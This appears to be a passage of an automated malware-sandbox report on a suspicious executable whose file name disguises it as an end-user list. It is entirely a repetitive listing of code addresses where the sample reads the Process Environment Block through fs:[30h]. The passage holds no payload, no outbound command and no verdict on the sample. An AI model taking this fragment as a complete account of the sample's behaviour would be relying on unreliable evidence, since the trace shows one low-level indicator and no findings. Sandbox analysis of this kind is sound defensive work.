                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE53E mov eax, dword ptr fs:[00000030h]2_2_012CE53E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0535 mov eax, dword ptr fs:[00000030h]2_2_012B0535
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01336500 mov eax, dword ptr fs:[00000030h]2_2_01336500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374500 mov eax, dword ptr fs:[00000030h]2_2_01374500
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D656A mov eax, dword ptr fs:[00000030h]2_2_012D656A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8550 mov eax, dword ptr fs:[00000030h]2_2_012A8550
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8550 mov eax, dword ptr fs:[00000030h]2_2_012A8550
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013205A7 mov eax, dword ptr fs:[00000030h]2_2_013205A7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C45B1 mov eax, dword ptr fs:[00000030h]2_2_012C45B1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C45B1 mov eax, dword ptr fs:[00000030h]2_2_012C45B1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D4588 mov eax, dword ptr fs:[00000030h]2_2_012D4588
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A2582 mov eax, dword ptr fs:[00000030h]2_2_012A2582
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A2582 mov ecx, dword ptr fs:[00000030h]2_2_012A2582
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE59C mov eax, dword ptr fs:[00000030h]2_2_012DE59C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC5ED mov eax, dword ptr fs:[00000030h]2_2_012DC5ED
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC5ED mov eax, dword ptr fs:[00000030h]2_2_012DC5ED
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A25E0 mov eax, dword ptr fs:[00000030h]2_2_012A25E0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CE5E7 mov eax, dword ptr fs:[00000030h]2_2_012CE5E7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE5CF mov eax, dword ptr fs:[00000030h]2_2_012DE5CF
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE5CF mov eax, dword ptr fs:[00000030h]2_2_012DE5CF
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A65D0 mov eax, dword ptr fs:[00000030h]2_2_012A65D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA5D0 mov eax, dword ptr fs:[00000030h]2_2_012DA5D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA5D0 mov eax, dword ptr fs:[00000030h]2_2_012DA5D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129E420 mov eax, dword ptr fs:[00000030h]2_2_0129E420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129C427 mov eax, dword ptr fs:[00000030h]2_2_0129C427
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D8402 mov eax, dword ptr fs:[00000030h]2_2_012D8402
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D8402 mov eax, dword ptr fs:[00000030h]2_2_012D8402
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D8402 mov eax, dword ptr fs:[00000030h]2_2_012D8402
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132C460 mov ecx, dword ptr fs:[00000030h]2_2_0132C460
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CA470 mov eax, dword ptr fs:[00000030h]2_2_012CA470
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CA470 mov eax, dword ptr fs:[00000030h]2_2_012CA470
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CA470 mov eax, dword ptr fs:[00000030h]2_2_012CA470
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135A456 mov eax, dword ptr fs:[00000030h]2_2_0135A456
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129645D mov eax, dword ptr fs:[00000030h]2_2_0129645D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C245A mov eax, dword ptr fs:[00000030h]2_2_012C245A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A64AB mov eax, dword ptr fs:[00000030h]2_2_012A64AB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132A4B0 mov eax, dword ptr fs:[00000030h]2_2_0132A4B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D44B0 mov ecx, dword ptr fs:[00000030h]2_2_012D44B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135A49A mov eax, dword ptr fs:[00000030h]2_2_0135A49A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A04E5 mov ecx, dword ptr fs:[00000030h]2_2_012A04E5
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131C730 mov eax, dword ptr fs:[00000030h]2_2_0131C730
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC720 mov eax, dword ptr fs:[00000030h]2_2_012DC720
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC720 mov eax, dword ptr fs:[00000030h]2_2_012DC720
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D273C mov eax, dword ptr fs:[00000030h]2_2_012D273C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D273C mov ecx, dword ptr fs:[00000030h]2_2_012D273C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D273C mov eax, dword ptr fs:[00000030h]2_2_012D273C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC700 mov eax, dword ptr fs:[00000030h]2_2_012DC700
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A0710 mov eax, dword ptr fs:[00000030h]2_2_012A0710
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D0710 mov eax, dword ptr fs:[00000030h]2_2_012D0710
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A8770 mov eax, dword ptr fs:[00000030h]2_2_012A8770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D674D mov esi, dword ptr fs:[00000030h]2_2_012D674D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D674D mov eax, dword ptr fs:[00000030h]2_2_012D674D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D674D mov eax, dword ptr fs:[00000030h]2_2_012D674D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01324755 mov eax, dword ptr fs:[00000030h]2_2_01324755
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132E75D mov eax, dword ptr fs:[00000030h]2_2_0132E75D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A0750 mov eax, dword ptr fs:[00000030h]2_2_012A0750
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2750 mov eax, dword ptr fs:[00000030h]2_2_012E2750
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2750 mov eax, dword ptr fs:[00000030h]2_2_012E2750
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A07AF mov eax, dword ptr fs:[00000030h]2_2_012A07AF
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013547A0 mov eax, dword ptr fs:[00000030h]2_2_013547A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134678E mov eax, dword ptr fs:[00000030h]2_2_0134678E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C27ED mov eax, dword ptr fs:[00000030h]2_2_012C27ED
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C27ED mov eax, dword ptr fs:[00000030h]2_2_012C27ED
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C27ED mov eax, dword ptr fs:[00000030h]2_2_012C27ED
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A47FB mov eax, dword ptr fs:[00000030h]2_2_012A47FB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A47FB mov eax, dword ptr fs:[00000030h]2_2_012A47FB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132E7E1 mov eax, dword ptr fs:[00000030h]2_2_0132E7E1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AC7C0 mov eax, dword ptr fs:[00000030h]2_2_012AC7C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013207C3 mov eax, dword ptr fs:[00000030h]2_2_013207C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A262C mov eax, dword ptr fs:[00000030h]2_2_012A262C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE627 mov eax, dword ptr fs:[00000030h]2_2_012BE627
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D6620 mov eax, dword ptr fs:[00000030h]2_2_012D6620
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D8620 mov eax, dword ptr fs:[00000030h]2_2_012D8620
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2619 mov eax, dword ptr fs:[00000030h]2_2_012E2619
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E609 mov eax, dword ptr fs:[00000030h]2_2_0131E609
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA660 mov eax, dword ptr fs:[00000030h]2_2_012DA660
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA660 mov eax, dword ptr fs:[00000030h]2_2_012DA660
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136866E mov eax, dword ptr fs:[00000030h]2_2_0136866E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136866E mov eax, dword ptr fs:[00000030h]2_2_0136866E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D2674 mov eax, dword ptr fs:[00000030h]2_2_012D2674
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BC640 mov eax, dword ptr fs:[00000030h]2_2_012BC640
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DC6A6 mov eax, dword ptr fs:[00000030h]2_2_012DC6A6
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D66B0 mov eax, dword ptr fs:[00000030h]2_2_012D66B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A4690 mov eax, dword ptr fs:[00000030h]2_2_012A4690
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A4690 mov eax, dword ptr fs:[00000030h]2_2_012A4690
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013206F1 mov eax, dword ptr fs:[00000030h]2_2_013206F1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013206F1 mov eax, dword ptr fs:[00000030h]2_2_013206F1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA6C7 mov ebx, dword ptr fs:[00000030h]2_2_012DA6C7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA6C7 mov eax, dword ptr fs:[00000030h]2_2_012DA6C7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132892A mov eax, dword ptr fs:[00000030h]2_2_0132892A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0133892B mov eax, dword ptr fs:[00000030h]2_2_0133892B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132C912 mov eax, dword ptr fs:[00000030h]2_2_0132C912
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01298918 mov eax, dword ptr fs:[00000030h]2_2_01298918
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01298918 mov eax, dword ptr fs:[00000030h]2_2_01298918
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E908 mov eax, dword ptr fs:[00000030h]2_2_0131E908
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E908 mov eax, dword ptr fs:[00000030h]2_2_0131E908
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E096E mov eax, dword ptr fs:[00000030h]2_2_012E096E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E096E mov edx, dword ptr fs:[00000030h]2_2_012E096E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E096E mov eax, dword ptr fs:[00000030h]2_2_012E096E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01344978 mov eax, dword ptr fs:[00000030h]2_2_01344978
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01344978 mov eax, dword ptr fs:[00000030h]2_2_01344978
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C6962 mov eax, dword ptr fs:[00000030h]2_2_012C6962
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C6962 mov eax, dword ptr fs:[00000030h]2_2_012C6962
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C6962 mov eax, dword ptr fs:[00000030h]2_2_012C6962
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132C97C mov eax, dword ptr fs:[00000030h]2_2_0132C97C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01320946 mov eax, dword ptr fs:[00000030h]2_2_01320946
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374940 mov eax, dword ptr fs:[00000030h]2_2_01374940
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013289B3 mov esi, dword ptr fs:[00000030h]2_2_013289B3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013289B3 mov eax, dword ptr fs:[00000030h]2_2_013289B3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013289B3 mov eax, dword ptr fs:[00000030h]2_2_013289B3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A09AD mov eax, dword ptr fs:[00000030h]2_2_012A09AD
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A09AD mov eax, dword ptr fs:[00000030h]2_2_012A09AD
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132E9E0 mov eax, dword ptr fs:[00000030h]2_2_0132E9E0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D29F9 mov eax, dword ptr fs:[00000030h]2_2_012D29F9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D29F9 mov eax, dword ptr fs:[00000030h]2_2_012D29F9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136A9D3 mov eax, dword ptr fs:[00000030h]2_2_0136A9D3
